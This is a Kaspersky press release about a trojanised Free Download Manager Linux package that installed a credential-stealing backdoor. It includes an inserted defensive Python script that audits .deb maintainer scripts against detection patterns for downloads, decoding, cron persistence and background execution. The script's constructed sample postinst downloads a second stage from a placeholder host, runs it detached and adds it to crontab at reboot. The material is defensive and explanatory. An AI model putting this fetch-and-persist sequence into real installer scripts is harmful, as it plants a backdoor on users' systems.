Kaspersky experts identified a new malicious campaign targeting Linux systems, in which threat actors deployed a backdoor – a type of Trojan – onto victims’ devices using an infected version of a popular free software package: Free Download Manager. Once a device is infected, the attackers’ goal is to steal information such as details about the system, browsing history, saved passwords, cryptocurrency wallet files, and even credentials for cloud services like Amazon Web Services or Google Cloud. According to Kaspersky’s telemetry, victims of this campaign are located all over the world, including Brazil, China, Saudi Arabia and Russia.
Kaspersky experts believe it is likely that this is a supply chain attack. While investigating YouTube installation guides for Free Download Manager on Linux computers, the company’s experts found instances where video creators inadvertently showcased the initial infection process: clicking the download button on the official website resulted in a malicious version of Free Download Manager being downloaded. In contrast, in another video, a legitimate version of the software was downloaded. It is possible that the malware developers scripted the malicious redirection to occur with some degree of probability or based on the digital fingerprint of the potential victim. As a result, some users received a malicious package, while others obtained a clean one.
According to Kaspersky’s findings, the campaign lasted for at least three years – from 2020 to 2022. The malicious package installed the Free Download Manager version released in 2020. Moreover, over the course of this timeframe, there were discussions on websites such as StackOverflow and Reddit about problems caused by the infected software distribution. However, the users were unaware that these issues were caused by malicious activity.
A Reddit user wondered whether they could install Free Download Manager without running a script that turned out to contain malware
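The Reddit question above points at the check a defender would want to run before installing any downloaded package: look at the maintainer scripts a .deb executes during installation and flag the behaviours an installer has no business performing. The following script is an added example written for this page; it is not code from Kaspersky or from the Free Download Manager project, and it does not reproduce the actual malicious script. It builds a constructed sample package in memory (the hypothetical `postinst` content, the `example.invalid` host and the `sample-fdm` package name are all made up for the demonstration), parses the outer `ar` container and the `control.tar.gz` archive with the Python standard library, and reports any lines in `preinst`/`postinst`/`prerm`/`postrm` that download remote content, decode embedded payloads, add cron persistence or detach a background process.

```python
"""Audit a Debian package's maintainer scripts before running `dpkg -i`.

Added example, not Kaspersky's or the FDM project's code. The package built
here is a constructed stand-in with a hypothetical postinst, not the real
malicious script from the campaign.
"""
import io
import re
import tarfile

MAINTAINER_SCRIPTS = ("preinst", "postinst", "prerm", "postrm")

# Behaviours an installer script should not exhibit; each label is a heuristic,
# so a hit is a reason to read the script, not proof of malice.
SUSPICIOUS_PATTERNS = {
    "remote download": re.compile(r"\b(curl|wget)\b"),
    "encoded payload": re.compile(r"base64\s+(-d|--decode)"),
    "persistence via cron": re.compile(r"\bcrontab\b|/etc/cron"),
    "background execution": re.compile(r"\bnohup\b|(?<!&)&\s*$"),
}


def _ar_member(name: str, data: bytes) -> bytes:
    """Serialise one member of the 'ar' archive that wraps a .deb (60-byte header)."""
    header = (name.ljust(16).encode()          # file identifier
              + b"0".ljust(12)                 # mtime
              + b"0".ljust(6) + b"0".ljust(6)  # uid, gid
              + b"100644".ljust(8)             # mode
              + str(len(data)).encode().ljust(10)
              + b"`\n")
    return header + data + (b"\n" if len(data) % 2 else b"")  # 2-byte aligned


def _tar_gz(files: dict) -> bytes:
    """Pack {path: bytes} into a gzip-compressed tar archive in memory."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for path, content in files.items():
            info = tarfile.TarInfo(name=path)
            info.size, info.mode = len(content), 0o755
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()


def build_sample_deb(postinst: bytes) -> bytes:
    """Constructed .deb: debian-binary + control archive + minimal data archive."""
    control = _tar_gz({
        "./control": b"Package: sample-fdm\nVersion: 0.0\nArchitecture: all\n"
                     b"Maintainer: constructed <none@example.invalid>\n"
                     b"Description: constructed sample for the audit demo\n",
        "./postinst": postinst,
    })
    data = _tar_gz({"./usr/share/doc/sample-fdm/README": b"constructed sample\n"})
    return (b"!<arch>\n" + _ar_member("debian-binary", b"2.0\n")
            + _ar_member("control.tar.gz", control) + _ar_member("data.tar.gz", data))


def ar_members(blob: bytes) -> dict:
    """Parse the outer ar archive of a .deb into {member name: bytes}."""
    if not blob.startswith(b"!<arch>\n"):
        raise ValueError("not an ar archive")
    members, pos = {}, 8
    while pos + 60 <= len(blob):
        header = blob[pos:pos + 60]
        if header[58:60] != b"`\n":
            raise ValueError("corrupt ar member header")
        name = header[:16].decode().strip().rstrip("/")   # GNU ar appends '/'
        size = int(header[48:58].decode().strip())
        members[name] = blob[pos + 60:pos + 60 + size]
        pos += 60 + size + (size % 2)
    return members


def maintainer_scripts(deb: bytes) -> dict:
    """Return {script name: text} for the maintainer scripts inside control.tar.*."""
    members = ar_members(deb)
    control_name = next((n for n in members if n.startswith("control.tar")), None)
    if control_name is None:
        raise ValueError("package has no control archive")
    scripts = {}
    with tarfile.open(fileobj=io.BytesIO(members[control_name]), mode="r:*") as tar:
        for entry in tar.getmembers():
            base = entry.name.split("/")[-1]
            if entry.isfile() and base in MAINTAINER_SCRIPTS:
                scripts[base] = tar.extractfile(entry).read().decode(errors="replace")
    return scripts


def audit_scripts(scripts: dict) -> list:
    """Return (script, label, line) for every line matching a suspicious pattern."""
    findings = []
    for name, text in scripts.items():
        for line in text.splitlines():
            for label, pattern in SUSPICIOUS_PATTERNS.items():
                if pattern.search(line):
                    findings.append((name, label, line.strip()))
    return findings


# Hypothetical postinst modelled on the downloader-plus-persistence pattern (constructed).
SUSPICIOUS_POSTINST = b"""#!/bin/sh
set -e
curl -fsSL http://updates.example.invalid/stage2 -o /tmp/.stage2
chmod +x /tmp/.stage2
nohup /tmp/.stage2 >/dev/null 2>&1 &
(crontab -l 2>/dev/null; echo "@reboot /tmp/.stage2") | crontab -
exit 0
"""

# What a benign desktop-application postinst usually looks like (constructed).
CLEAN_POSTINST = b"#!/bin/sh\nset -e\nupdate-desktop-database -q || true\nexit 0\n"

if __name__ == "__main__":
    for label, script in (("suspicious", SUSPICIOUS_POSTINST), ("clean", CLEAN_POSTINST)):
        for finding in audit_scripts(maintainer_scripts(build_sample_deb(script))) or [(label, "none", "no findings")]:
            print(label, *finding, sep=" | ")
```

To use it on a real download, replace `build_sample_deb(...)` with the bytes of the file you fetched (`open("package.deb", "rb").read()`) and read every script it returns in full; the heuristics only tell you where to look. A package whose installer fetches and detaches a second stage, as the constructed sample does, is exactly the case where the user in the Reddit thread was right to hesitate.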
“Variants of the analyzed backdoor have been detectable by Kaspersky solutions for Linux since 2013. However, there is a widespread misconception that Linux is immune to malware, leaving many of these systems without adequate cybersecurity protection. This lack of protection makes these systems attractive targets for cybercriminals. Essentially, the Free Download Manager case highlights the challenge of spotting an ongoing cyberattack on a Linux system with the naked eye. Therefore, it's essential for Linux-based computers, including both desktops and servers, to implement reliable and effective security measures,” says Georgy Kucherin, a security expert at GReAT, Kaspersky.
Technical analysis of the campaign is presented in the Securelist post.
To avoid Linux-based and other types of threats, it is worth implementing the following security measures:
Kaspersky is a global cybersecurity and digital privacy company founded in 1997. Kaspersky’s deep threat intelligence and security expertise is constantly transforming into innovative solutions and services to protect businesses, critical infrastructure, governments and consumers around the globe. The company’s comprehensive security portfolio includes leading endpoint protection, specialized security products and services, as well as Cyber Immune solutions to fight sophisticated and evolving digital threats. Over 400 million users are protected by Kaspersky technologies and we help over 220,000 corporate clients protect what matters most to them. Learn more at www.kaspersky.com.